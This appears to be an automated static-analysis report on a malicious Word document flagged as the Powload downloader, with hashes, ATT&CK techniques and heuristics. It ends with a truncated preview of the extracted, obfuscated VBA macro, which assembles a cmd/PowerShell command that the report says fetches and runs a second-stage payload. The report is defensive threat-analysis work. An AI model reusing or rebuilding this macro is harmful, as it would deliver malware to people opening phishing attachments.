Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04730e6ef6eec020…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 83.6 KB
Created: 2018-08-17 18:46:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 797c97736b63152d6a92b4c33a13fe40
SHA-1: afbfa7ddd12d00b1d6249e9b3fc2dc2a59ca7edb
SHA-256: 04730e6ef6eec020e2fecc048a707104d0b94f81dbc9a68ee264bf41e90fd340
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro constructs a command string that appears to download and execute a second-stage payload using PowerShell. The ClamAV detection 'Doc.Downloader.Powload-6803405-0' further supports this analysis.

Heuristics (5)

  • ClamAV: Doc.Downloader.Powload-6803405-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Powload-6803405-0
  • VBA macros detected [medium; 1 related finding; OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 38715 bytes
SHA-256: 808ecc8289d204002cdaa326af4a39fc4144d7534706339bcfe487babf2b5f1a

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "DfsJYNvXJAEcfU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nsjJBIK"
Function wdZmEtKBWk()
On Error Resume Next
VarType Hex(iXYXh + TWaPvD)
   IsArray CCur(ffRFCm)
   IsArray GATJp
ikUwOoszj = "mD  /V" + ":o " + " /C  " + " " + CStr(Chr(ajhrCtcCGn + llFRFtuMV + 34 + QFrnzsQmtpSo + EMlJqHH)) + " s^ET" + "^ " + "^ ^ ^" + "7^U^=p" + "^o^]er" + "/" + "he" + "^ll^ ^`"
IsArray Hex(3)
   UAkSB = Atn(52)
   UAkSB = 250811356
pqEjJtWW = "e 1^X" + "2^iX^G" + "kXR^X" + "X^9XG#X" + "Z^" + "Q23" + "^X" + "C^0^Xb^" + "]^2iX^G" + "^o^X^" + "Z^Q2^" + "j^XHQ^" + "X^IX"
UAkSB = Val(XzjVwD)
   IsArray wZUWz
   VarType mhRKW
npkRsL = "^2O" + "X^G" + "^U^X" + "d^XX^uX" + "^FcX^Z" + "Q2iX^E" + "^MXbX2" + "p^X^GU" + "Xbg^20" + "^" + "XD/^X^" + "1X2^"
VarType 6578
   VarType Rnd(11)
EHTumWniwBz = "}^X^" + "E" + "M^X" + "T]X9XCc" + "XaX2"
UAkSB = Month(2)
   IsArray Hex(iZZiJ)
   IsArray Second(Qraqqs / aTpFR)
EUwqaRQjo = "0X^HQ^" + "XcXX^6^" + "XC^8" + "^X^L]" + "^2^z" + "^X" + "^" + "G^#" + "Xb]2^3^"
VarType Hex(97393 + iMLhfE)
   UAkSB = Sgn(16649 - CilSt / 1143 + cHvRNv)
   UAkSB = Sin(jEHaN - qaRSO)
GdXAljhwR = "XGQ^X" + "^" + "b]" + "^2/^XG^" + "]XL^g" + "2^" + "uX^GU" + "^X" + "dXXv" + "XD^I^X" + "R]"
wdZmEtKBWk = ikUwOoszj + pqEjJtWW + npkRsL + EHTumWniwBz + EUwqaRQjo + GdXAljhwR
   IsArray 78726312
   UAkSB = 200985733
   UAkSB = VtaWN
End Function
Function XKtmFnZoC()
On Error Resume Next
VarType CVar(iIrUm / VLKhw)
   IsArray CCur(ZfHzL)
wvVZwfVSk = "^2l^XE^" + "X" + "Xa" + "^X^2" + "^0" + "^XH^QXc" + "^XX6^" + "XC8^XL]" + "2^z" + "XHk^Xb" + "^]2" + "^u^X^GU" + "^"
VarType NwHts
   VarType otABfS
   IsArray CCur(2)
JKwPQuu = "Xbg" + "^2qXHU" + "X^bQ^" + "2]" + "XC^0X^Z" + "g2.XG#" + "^X" + "L^g"
UAkSB = AskTw
   VarType CDec(536)
mwnLcJzjwmw = "^2^j^" + "XG^8X^" + "bQ" + "Xv^X^H" + "X^X^b" + "^X^2^X" + "XG^"
UAkSB = Month(893)
   VarType Log(UvPQZ)
QGiTw = "g^X^" + "dX^20X^" + "H^X" + "^XOg" + "^XvX" + "C^8^X" + "cX2^o" + "X^G^8^" + "Xe^X2^" + "h" + "XH^" + "IX^dX" + "^XuX"
VarType Month(241)
   UAkSB = 4
oXvcdYllAsK = "G^" + "M^X^b^]" + "^2" + "t^" + "XC" + "^" + "8^X^"
IsArray CVar(4598)
   UAkSB = udnNVn
lmCLTEVT = "M^Q^X5X" + "^E^X^" + "Xa^" + "X2" + "0^X^H^"
IsArray 286039691
   UAkSB = 365539205
rzJMaSHKt = "Q^Xc^" + "XX^6XC^" + "8X^" + "L]" + "^2u^X^G" + "g^X^d" + "^Q2^h"
IsArray Str(IHftz)
   UAkSB = 307532658
   UAkSB = 704
AjauKmG = "^" + "X^" + "G]^X" + "Y^Q^" + "25X" + "^H^MX^"
VarType zPzLOW
   IsArray miYUY
rVvRlvhXVGj = "YQ2" + "u^X^" + "GcX^Y^" + "]" + "^2v^XG" + "^" + "0^Xc" + "^X" + "^2vX^" + "H" + "MXaQ^"
IsArray Fix(SziNp)
   VarType Sin(67)
   IsArray Oct(WTKSb * rrMKA - 60563 - 93809)
bZZZCpPP = "20^X" + "^G^UXL^" + "g2^jX" + "G8Xb" + "^Q" + "Xv^X" + "^E^0XS" + "^g^2" + "^" + "1XGY^X" + "WQ2XX^G" + "gXd^X^"
XKtmFnZoC = wvVZwfVSk + JKwPQuu + mwnLcJzjwmw + QGiTw + oXvcdYllAsK + lmCLTEVT + rzJMaSHKt + AjauKmG + rVvRlvhXVGj + bZZZCpPP
   IsArray 7922
   VarType Fix(wJqXzo)
End Function
Function WBisKLj()
On Error Resume Next
IsArray ajDFwq
   IsArray 9
HoQJhMcWnJj = "2^" + "0XH^" + "XXO^gX" + "vXC" + "8^XbQ2" + "^5^X" + "^G#" + "^XZQ2^" + "pXG"
UAkSB = MErBp
   IsArray ZOVDI
   VarType 693
SlMjk = "c^Xa^X" + "^2^i" + "^XG8^X" + "c^g^X" + "u^X^GM" + "^Xb]^2"
VarType UGhiHL
   VarType CDbl(470016367)
   UAkSB = TimeValue(40252 / HJEDp + 56435 * TBknm)
AZPHDXMo = "^tXC^#" + "Xd^" + "X2^3^X" + "C8XR" + "^" + "Q2^h^X" + "^Dc^X" + "R]^X^" + "3^X^G^]" + "^" + "X^"
IsArray 95
   VarType Fix(420638883)
qRnJQsqNt = "d]2RXC" + "cX^Lg" + "2^T^X" + "^" + "H^X" + "X" + "bX2p" + "^XHQX" + "KX^X" + ")^X^" + "E" + "X^X1]^" + "Xp^X^D"
VarType Int(BjMXBz / 41580)
   UAkSB = Sgn(32248805)
tjqrZUdpYO = "/X1X2" + "Q^" + "X^F" + "EXQ" + "^]Xg^" + "X^D0" + "^X^IXX" + ")XD^YX^" + "+^Q^"
VarType 4081
   IsArra
... (truncated)